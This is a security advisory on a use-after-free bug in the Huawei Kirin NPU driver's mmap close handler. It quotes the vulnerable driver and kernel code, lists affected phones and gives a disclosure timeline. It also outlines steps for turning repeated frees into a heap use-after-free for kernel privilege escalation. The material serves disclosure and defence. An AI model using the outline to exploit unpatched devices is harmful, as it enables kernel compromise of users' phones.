Summary
Due to a bug in the way mappings are closed it is possible to free a kmallocated memory chunk arbitrary times. This vulnerability can be used to craft a use after free scenario against any kernel structure that is allocated from the kmalloc-64 cache. There is rich public literature on how such use after free vulnerabilities can be utilized to compromise the kernel, achieve code execution in kernel context, and elevate privileges of user space processes. Even when modern mitigation is deployed.
The mmap handler is exposed through the /dev/davinci0
character device.
Due to the applied selinux policy, access to this device is restricted to the hiaiserver
system process.
Because of these limitations a practical attack would need to target the hiaiserver first.
The /dev/davinci0
device exposes an mmap handler called devdrv_npu_map
(defined in drivers/hisi/npu/device/npu_devinit.c
) that allocates a struct npu_vma_mmapping
for each new mapping.
The pointer to this structure is stored in the vma’s vm_private_data
field.
The handler also sets up custom vm operations for these vmas.
The main issue lies in the close operation handler npu_vm_close
which simply frees the vm_private_data
pointer.
This behavior is based on the assumption that mappings are unmapped in whole and the close operation is only triggered on the same private data once.
Unfortunately, this assumption is not always true.
The problem is that one of the operations of a vm_operations_struct
is the split operation and because this driver’s implementation does not define a custom handler for the split operation, the code will only execute the default steps, whenever a split becomes necessary, without the default implementation calling the custom handler in addition.
And, in fact, an attacker can trigger a split by mmapping multiple consecutive pages worth of memory of the device but then calling munmmap on a page inside that region only instead of the whole region.
The default behavior in this case will split the original region’s representation and result in shallow copies of the vma when creating the representation for newly split regions.
Meaning that all split regions’ vmas will include a pointer to the same vm_private_data
.
Therefore, when a close operation is executed for an unmapped split, the copied pointer to the kmalloced structure is freed immediately, leaving dangling pointers to the same freed memory in all other split regions vmas.
The result is that consecutive calls to unmmap, on the leftover memory of the region, trigger the same close handler with the same (dangling) pointer value, that most likely points to a reclaimed kmalloc slab allocated by a different kernel process.
These steps can be repeated for each page of the original mapping, triggering the kfree on the same pointer each time.
The mappings are created by the code below, which allocates the private data:
static int devdrv_npu_map(struct file *filep, struct vm_area_struct *vma)
{
unsigned long vm_pgoff;
struct devdrv_proc_ctx *proc_ctx = NULL;
struct npu_vma_mmapping *npu_vma_map = NULL;
// ...
// 1. npu_vma_map is allocated
npu_vma_map = (struct npu_vma_mmapping *)kzalloc (sizeof(struct npu_vma_mmapping), GFP_KERNEL);
COND_RETURN_ERROR(npu_vma_map == NULL, -EINVAL, "alloc npu_vma_map fail\n");
// 2. npu_vma_map is stored in vma's private data
// custom vm_ops is set up
vma->vm_flags |= VM_DONTCOPY;
vma->vm_ops = &npu_vm_ops;
vma->vm_private_data = (void *)npu_vma_map;
vma->vm_ops->open(vma);
mutex_unlock(&proc_ctx->map_mutex);
if (ret != 0)
NPU_DRV_ERR("map_type = %d memory mmap failed\n", map_type);
return ret;
}
The normal code flow is the following, the munmap syscall triggers the vm_munmap
function, which calls do_unmap
, which ends up calling __split_vma
when unmapping a partial region.
The digest of the __split_vma
is presented below, it calls the split handler, creates a copy of the vma structure, adjusts the boundaries of the vma-s and calls the open handler of the new vma.
int __split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long addr, int new_below)
{
struct vm_area_struct *new;
int err;
// 1. split callback is executed if defined
if (vma->vm_ops && vma->vm_ops->split) {
err = vma->vm_ops->split(vma, addr);
if (err)
return err;
}
// 2. new vma allocated
new = kmem_cache_alloc(vm_area_cachep, GFP_KERNEL);
if (!new)
return -ENOMEM;
// 3. the vma is copied including the vm_private_data field
/* most fields are the same, copy all, and then fixup */
*new = *vma;
//...
// 4. open handler is called for the new vma
if (new->vm_ops && new->vm_ops->open)
new->vm_ops->open(new);
if (new_below)
err = vma_adjust(vma, addr, vma->vm_end, vma->vm_pgoff +
((addr - new->vm_start) >> PAGE_SHIFT), new);
else
err = vma_adjust(vma, vma->vm_start, addr, vma->vm_pgoff, new);
/* Success. */
if (!err)
return 0;
Once done with the splitting do_unmap
eventually calls remove_vma_list/remove_vma
on the unmapped vma, which finally executes the custom close callback.
The NPU driver’s vulnerable close callback is shown below.
void npu_vm_close(struct vm_area_struct *vma)
{
struct npu_vma_mmapping *npu_vma_map = NULL;
//...
npu_vma_map = (struct npu_vma_mmapping *)vma->vm_private_data;
//...
// 1. npu_vma_map is freed in the close handler
kfree(npu_vma_map);
// 2. this only zeroes the pointer in the copied vma
vma->vm_private_data = NULL;
}
const struct vm_operations_struct npu_vm_ops = {
// 3. custom split operation is not defined
.open = npu_vm_open,
.close = npu_vm_close,
};
The size of struct npu_vma_mmapping
is 48 bytes so it is allocated in the general kmalloc-64 cache.
The repeated kfrees can be used to craft a use after free primitive against any of the kernel structures that are allocated from the general cache and fall between 0 and 64 bytes in size.
The following steps describe such scenario:
- The attacker mmaps at least two pages from
/dev/davinci0
- The first page is unmmaped triggering the kfree on the original allocation
- The victim kernel structure is sprayed to retake the free slot that belonged to the
npu_vma_mmapping
- The second page is unmmaped triggering a kfree on the original address, which now should contain the victim structure
- The attacker sprays controlled data on the kernel heap in order to overwrite the freed victim structure which is still being used by the kernel
Affected Devices (Verified)
- Kirin 990
- Huawei Mate 30 Pro (LIO)
- Huawei P40 Pro (ELS)
- Huawei P40 (ANA)
Fix
Huawei OTA images, released after February 2021, contain the fix for the vulnerability.
Timeline
- 2020.10.30. Bug reported to Huawei PSIRT
- 2020.11.25. Huawei PSIRT confirms vulnerability, confirms fix plans
- 2021.01.31. OTA distribution of the fix, mitigating the vulnerability, starts
- 2021.06.09. Huawei assigns CVEs
- 2021.06.30. Huawei releases security bulletin